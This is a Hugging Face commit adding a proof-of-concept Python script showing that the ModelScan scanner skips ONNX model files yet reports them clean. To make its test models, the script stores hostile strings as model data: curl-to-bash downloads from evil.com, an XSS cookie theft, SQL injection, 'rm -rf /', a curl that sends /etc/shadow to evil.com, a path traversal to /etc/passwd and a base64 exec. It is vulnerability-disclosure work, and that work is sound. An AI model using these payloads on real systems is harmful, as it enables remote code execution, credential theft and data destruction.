Rammadaeus
/

onnx-modelscan-gap-poc

ONNX

Model card Files Files and versions

xet

Community

Rammadaeus committed on Feb 16

Commit

0b6c068

verified ·

1 Parent(s): d425d32

Upload poc_modelscan_onnx_gap.py with huggingface_hub

Browse files

Files changed (1) hide show

poc_modelscan_onnx_gap.py +321 -0

poc_modelscan_onnx_gap.py ADDED Viewed

	@@ -0,0 +1,321 @@

+#!/usr/bin/env python3
+"""
+ModelScan ONNX Scanning Gap PoC
+VULNERABILITY:
+  ModelScan (by ProtectAI) claims to scan ML model files for security issues.
+  However, it completely SKIPS all ONNX model files. When pointed at an ONNX
+  file, ModelScan reports "No issues found!" while simultaneously noting in
+  fine print that the file was "skipped" and "not scanned."
+  This means any ONNX model -- regardless of how malicious -- passes ModelScan
+  with a clean bill of health.
+IMPACT:
+  - ONNX models can contain custom operator implementations that reference
+    attacker-controlled shared libraries (.so/.dll)
+  - ONNX models can reference external data files via relative paths,
+    enabling path traversal attacks (e.g. ../../../etc/passwd)
+  - ONNX models can embed arbitrary strings in metadata and operator attributes
+    (shell commands, Python code, injection payloads)
+  - ONNX Runtime custom ops can execute arbitrary native code at inference time
+  - ModelScan reports ALL of these as clean, giving false confidence
+  - Users who rely on ModelScan to vet ONNX files before loading them get
+    zero protection
+AFFECTED:
+  - modelscan 0.8.7 (latest as of 2026-02-16)
+  - All ONNX model files are completely unscanned
+TESTED: modelscan 0.8.7, onnx 1.20.1, Python 3.12
+Usage:
+  python3 poc_modelscan_onnx_gap.py
+"""
+import os
+import sys
+import subprocess
+try:
+    import onnx
+    from onnx import TensorProto, helper
+    HAS_ONNX = True
+except ImportError:
+    HAS_ONNX = False
+    print("[!] WARNING: onnx package not installed. Install with: pip install onnx")
+    sys.exit(1)
+# Resolve the modelscan executable once at import time. The per-user install
+# location (~/.local/bin) is checked first.
+MODELSCAN_BIN = os.path.expanduser("~/.local/bin/modelscan")
+if not os.path.exists(MODELSCAN_BIN):
+    # Not present there: look it up on PATH. If that also fails, keep the bare
+    # command name so the problem surfaces as FileNotFoundError when
+    # run_modelscan() tries to launch it.
+    import shutil
+    MODELSCAN_BIN = shutil.which("modelscan") or "modelscan"
+def create_simple_onnx_model(output_path):
+    """Create a simple, legitimate ONNX model (baseline)."""
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    identity_node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
+    graph = helper.make_graph([identity_node], "simple_graph", [X], [Y])
+    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
+    model.doc_string = "A simple identity model"
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def create_suspicious_custom_op_model(output_path):
+    """
+    Create an ONNX model with a custom operator from an attacker domain.
+    Custom ops require loading external shared libraries at runtime.
+    The operator attribute contains an explicit shell command string.
+    """
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    custom_node = helper.make_node(
+        "MaliciousTransform",
+        inputs=["X"],
+        outputs=["Y"],
+        domain="com.attacker.evil_ops",
+        name="evil_custom_op",
+    )
+    custom_node.attribute.append(
+        helper.make_attribute("shell_cmd", "curl http://evil.com/payload | bash")
+    )
+    graph = helper.make_graph([custom_node], "custom_op_graph", [X], [Y])
+    model = helper.make_model(
+        graph,
+        opset_imports=[
+            helper.make_opsetid("", 13),
+            helper.make_opsetid("com.attacker.evil_ops", 1),
+        ],
+    )
+    model.doc_string = "Model with custom operator that could load malicious shared library"
+    entry = model.metadata_props.add()
+    entry.key = "loader_script"
+    entry.value = "import os; os.system('curl http://evil.com/shell.sh | bash')"
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def create_external_data_traversal_model(output_path):
+    """
+    Create an ONNX model that references external data via path traversal.
+    The model's weight tensor points to ../../../etc/passwd as its data source.
+    """
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    weight_tensor = helper.make_tensor(
+        "weights", TensorProto.FLOAT, [5, 5],
+        [float(i) for i in range(25)]
+    )
+    matmul_node = helper.make_node("MatMul", inputs=["X", "weights"], outputs=["Y"])
+    graph = helper.make_graph(
+        [matmul_node], "external_data_graph", [X], [Y],
+        initializer=[weight_tensor],
+    )
+    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
+    for init in model.graph.initializer:
+        if init.name == "weights":
+            init.data_location = TensorProto.EXTERNAL
+            ext_info = init.external_data.add()
+            ext_info.key = "location"
+            ext_info.value = "../../../etc/passwd"
+            ext_info2 = init.external_data.add()
+            ext_info2.key = "offset"
+            ext_info2.value = "0"
+            ext_info3 = init.external_data.add()
+            ext_info3.key = "length"
+            ext_info3.value = "100"
+            init.ClearField("float_data")
+            init.ClearField("raw_data")
+            break
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def create_metadata_injection_model(output_path):
+    """
+    Create an ONNX model with code injection payloads in metadata fields.
+    Includes XSS, SQL injection, Python RCE, and base64-encoded exec.
+    """
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
+    graph = helper.make_graph([node], "metadata_graph", [X], [Y])
+    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
+    payloads = {
+        "description": "<script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>",
+        "author": "'; DROP TABLE models; --",
+        "license": "__import__('os').system('rm -rf /')",
+        "post_load_hook": "import subprocess; subprocess.run(['curl', 'http://evil.com/exfil', '-d', '@/etc/shadow'])",
+    }
+    for key, value in payloads.items():
+        entry = model.metadata_props.add()
+        entry.key = key
+        entry.value = value
+    model.doc_string = "eval(__import__('base64').b64decode('aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2lkJyk='))"
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def run_modelscan(model_path, label):
+    """Run modelscan CLI on a model file and return parsed results."""
+    print("\n  --- ModelScan on: {} ---".format(label))
+    try:
+        env = os.environ.copy()
+        env["PATH"] = os.path.expanduser("~/.local/bin") + ":" + env.get("PATH", "")
+        result = subprocess.run(
+            [MODELSCAN_BIN, "scan", "-p", model_path, "--show-skipped"],
+            capture_output=True, text=True, timeout=60, env=env,
+        )
+        output = result.stdout + result.stderr
+        # Filter out TF/CUDA noise
+        lines = []
+        for line in output.split("\n"):
+            if any(skip in line for skip in [
+                "cuda", "CUDA", "TensorFlow binary", "To enable",
+                "settings file detected", "cpu_feature_guard",
+            ]):
+                continue
+            lines.append(line)
+        clean_output = "\n".join(lines).strip()
+        # Print the key parts
+        for line in clean_output.split("\n"):
+            stripped = line.strip()
+            if stripped:
+                print("    | {}".format(stripped))
+        # Parse results
+        skipped = "skipped" in output.lower() and "did not scan" in output.lower()
+        no_issues = "No issues found" in output
+        issues_count = 0
+        if "Total Issues:" in output:
+            for line in output.split("\n"):
+                if "Total Issues:" in line:
+                    try:
+                        issues_count = int(line.split(":")[-1].strip())
+                    except ValueError:
+                        pass
+        return {
+            "scanned": not skipped,
+            "issues_found": issues_count,
+            "no_issues_reported": no_issues,
+            "skipped": skipped,
+        }
+    except FileNotFoundError:
+        print("    ERROR: modelscan binary not found at {}".format(MODELSCAN_BIN))
+        return {"scanned": False, "issues_found": 0, "no_issues_reported": False, "skipped": True}
+    except subprocess.TimeoutExpired:
+        print("    ERROR: Timed out")
+        return {"scanned": False, "issues_found": 0, "no_issues_reported": False, "skipped": True}
+def main():
+    print("=" * 70)
+    print("ModelScan ONNX Scanning Gap PoC")
+    print("=" * 70)
+    print()
+    print("modelscan binary: {}".format(MODELSCAN_BIN))
+    script_dir = os.path.dirname(os.path.abspath(__file__))
+    models_dir = os.path.join(script_dir, "models")
+    os.makedirs(models_dir, exist_ok=True)
+    # Create test models
+    models = []
+    print("\n[*] Creating test ONNX models...")
+    print("\n  1. Simple legitimate model (baseline):")
+    p = os.path.join(models_dir, "simple_identity.onnx")
+    create_simple_onnx_model(p)
+    models.append(("simple_identity.onnx (clean baseline)", p))
+    print("\n  2. Custom operator with shell command attribute:")
+    p = os.path.join(models_dir, "custom_op_suspicious.onnx")
+    create_suspicious_custom_op_model(p)
+    models.append(("custom_op_suspicious.onnx (shell_cmd in attacker domain)", p))
+    print("\n  3. External data with path traversal:")
+    p = os.path.join(models_dir, "external_data_traversal.onnx")
+    create_external_data_traversal_model(p)
+    models.append(("external_data_traversal.onnx (../../../etc/passwd)", p))
+    print("\n  4. Metadata injection payloads:")
+    p = os.path.join(models_dir, "metadata_injection.onnx")
+    create_metadata_injection_model(p)
+    models.append(("metadata_injection.onnx (XSS + SQLi + RCE + b64 exec)", p))
+    # Scan each model
+    print("\n" + "=" * 70)
+    print("[*] Running ModelScan on each model...")
+    results = []
+    for label, path in models:
+        r = run_modelscan(path, label)
+        results.append((label, r))
+    # Summary
+    print("\n" + "=" * 70)
+    print("RESULTS SUMMARY:")
+    print("-" * 70)
+    all_skipped = True
+    all_no_issues = True
+    for label, r in results:
+        if r["skipped"]:
+            status = "SKIPPED (not scanned) but reported 'No issues found'"
+        elif r["no_issues_reported"]:
+            status = "NO ISSUES FOUND"
+        elif r["issues_found"] > 0:
+            status = "ISSUES FOUND: {}".format(r["issues_found"])
+            all_no_issues = False
+        else:
+            status = "UNKNOWN"
+        if not r["skipped"]:
+            all_skipped = False
+        print("  {} => {}".format(label, status))
+    print()
+    if all_skipped:
+        print("VULNERABILITY CONFIRMED: ModelScan SKIPS all ONNX files entirely.")
+        print("It reports 'No issues found!' while the --show-skipped output reveals")
+        print("'Model Scan did not scan file' for every single ONNX model.")
+        print()
+        print("This means ModelScan provides ZERO security coverage for ONNX models:")
+        print("  - Custom operators from attacker-controlled domains: NOT SCANNED")
+        print("  - Shell command strings in operator attributes: NOT SCANNED")
+        print("  - Path traversal in external data references: NOT SCANNED")
+        print("  - Code injection payloads in metadata: NOT SCANNED")
+        print("  - base64-encoded Python exec in doc_string: NOT SCANNED")
+        print()
+        print("The 'No issues found!' message creates a false sense of security.")
+        print("Users trust ModelScan to protect them from malicious models, but")
+        print("ONNX -- one of the most widely used ML formats -- is completely blind.")
+    elif all_no_issues:
+        print("CONFIRMED: ModelScan reports no issues for all ONNX models.")
+    else:
+        print("ModelScan detected some issues. Review output above.")
+    print("=" * 70)
+# Run the PoC only when executed as a script, not when imported.
+if __name__ == "__main__":
+    main()